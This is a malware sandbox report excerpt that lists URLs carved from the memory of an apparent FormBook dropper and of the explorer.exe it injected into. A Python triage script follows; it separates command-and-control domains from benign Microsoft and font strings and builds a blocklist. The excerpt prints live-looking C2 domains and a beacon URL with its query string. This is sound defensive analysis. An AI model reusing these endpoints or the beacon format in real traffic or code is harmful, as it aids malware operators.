          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bond/c24t/www.oko.events
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ridges-freezers-56090.bondReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp, RFQ 245801.exe, 00000000.00000002.1752289178.0000000005400000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sx9u.shop
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sx9u.shop/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sx9u.shop/c24t/www.consuyt.xyz
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sx9u.shopReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.venir-bienne.info
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.venir-bienne.info/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.venir-bienne.info/c24t/www.ridges-freezers-56090.bond
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.venir-bienne.infoReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000006.00000002.4160246853.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1749071753.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000006.00000003.3116867213.000000000371C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3113868661.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1736214563.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4142888075.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4145708361.000000000371D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000002.4156756426.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000002.4156756426.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C557000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
          Source: RFQ 245801.exe | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
          Source: explorer.exe, 00000006.00000002.4161721752.00000000116FF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4145408903.0000000003ADF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
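The URL rows above mix three populations that deserve different handling: font-foundry and PuTTY strings that live in the .NET dropper's embedded resources (sajatypeworks, sakkal, tiro, urwpp.de, chiark.greenend.org.uk), MSN/Office strings that belong to explorer.exe's own memory, and the FormBook configuration, which is everything under the /c24t/ path. Two details of the listing are worth reading carefully: tails such as "shopReferer:" and "deDPlease" are bytes the string carver picked up adjacent to the real string, and fused rows such as www.sx9u.shop/c24t/www.consuyt.xyz are consistent with the decoded domain list lying contiguously in memory, so the part after /c24t/ is the next configured domain, not a path. Only www.j88.travel carries a full query string, and it is the one URL seen in NETSTAT.EXE memory as well as explorer.exe, which is what a beacon actually assembled at runtime looks like. The triage script below is an added example and is not part of the Joe Sandbox report or of any tool it references; it parses a constructed subset of the rows above (dump ids shortened, URLs copied from the report), separates the C2 candidates from the noise, and recovers the domains hidden in the fused pairs. Treating /c24t/ as the campaign path token and the noise allow-list are this example's assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed subset of the report's "String found in binary or memory" rows, copied in the
# flattened form the page prints them ("...sdmpString found in binary or memory: ...").
# Memory-dump ids are shortened; the URLs are the report's own.
REPORT_ROWS = [
    "Source: RFQ 245801.exe, 00000000.00000002.1752637973.sdmpString found in binary or memory: http://www.sajatypeworks.com",
    "Source: RFQ 245801.exe, 00000000.00000002.1752637973.sdmpString found in binary or memory: http://www.urwpp.deDPlease",
    "Source: explorer.exe, 00000006.00000003.3109082529.sdmpString found in binary or memory: http://www.sx9u.shop",
    "Source: explorer.exe, 00000006.00000003.3109082529.sdmpString found in binary or memory: http://www.sx9u.shop/c24t/",
    "Source: explorer.exe, 00000006.00000003.3109082529.sdmpString found in binary or memory: http://www.sx9u.shop/c24t/www.consuyt.xyz",
    "Source: explorer.exe, 00000006.00000003.3109082529.sdmpString found in binary or memory: http://www.sx9u.shopReferer:",
    "Source: explorer.exe, 00000006.00000003.3109082529.sdmpString found in binary or memory: http://www.venir-bienne.info/c24t/www.ridges-freezers-56090.bond",
    "Source: explorer.exe, 00000006.00000000.1743773191.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&",
    "Source: explorer.exe, 00000006.00000002.4161721752.sdmp, NETSTAT.EXE, 00000007.00000002.4145408903.sdmpString found in binary or memory: https://www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS",
    "Source: RFQ 245801.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0",
]

ROW_RE = re.compile(r"^Source: (?P<src>.*?)String found in binary or memory: (?P<url>\S+)$")
DOMAIN_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")

# Hosts that need no malware to explain them: Microsoft shell/news endpoints that
# explorer.exe caches anyway, and font-foundry / PuTTY strings that sit in the .NET
# dropper's embedded resources. This allow-list is the example's assumption, not the report's.
NOISE_HOSTS = ("www.sajatypeworks.com", "www.sakkal.com", "www.sandoll.co.kr", "www.tiro.com",
               "www.typography.net", "www.urwpp.de", "www.zhongyicts.com.cn",
               "www.chiark.greenend.org.uk", "aka.ms")
NOISE_SUFFIXES = (".msn.com", ".windows.com", ".office.com", "outlook.com")


def parse_rows(rows):
    """Yield (process names, url) per row; one row may credit several processes."""
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        procs = tuple(p.strip() for p in m.group("src").split(",")
                      if p.strip().lower().endswith(".exe"))
        yield procs, m.group("url")


def triage(rows, campaign_path="/c24t/"):
    """Split the carved URLs into FormBook C2 candidates, expected noise and leftovers.

    campaign_path is the path token every C2 URL in this report shares; treating it as
    the campaign identifier is an assumption about FormBook, not something the report
    states. Returns (c2, noise, other) with c2 mapping domain -> processes it was seen in.
    """
    c2, noise, other = defaultdict(set), set(), set()
    records = list(parse_rows(rows))
    for procs, url in records:
        if campaign_path not in url:
            continue
        head, tail = url.split(campaign_path, 1)
        c2[urlsplit(head).netloc.lower()].update(procs)
        # A fused pair ("/c24t/www.consuyt.xyz") exposes the next entry of the decoded
        # domain list; a query string ("?9rm4ULV=...") is a real beacon URL instead.
        if DOMAIN_RE.match(tail.lower()):
            c2[tail.lower()].update(procs)
    for procs, url in records:
        if campaign_path in url:
            continue
        host = urlsplit(url).netloc.lower()
        owner = next((d for d in c2 if host.startswith(d)), None)
        if host.startswith(NOISE_HOSTS) or host.endswith(NOISE_SUFFIXES):
            noise.add(host)
        elif owner:
            # Bare host or carver debris ("www.sx9u.shopReferer:") of a known C2 entry.
            c2[owner].update(procs)
        else:
            other.add(url)
    return dict(c2), noise, other


def blocklist(rows):
    """Sorted C2 domains, the form you would hand to DNS or proxy blocking."""
    return sorted(triage(rows)[0])


if __name__ == "__main__":
    c2, noise, other = triage(REPORT_ROWS)
    for domain, procs in sorted(c2.items()):
        print(f"C2 candidate {domain:35} seen in {', '.join(sorted(procs))}")
    print("noise:", sorted(noise))
    print("unclassified:", sorted(other))
```

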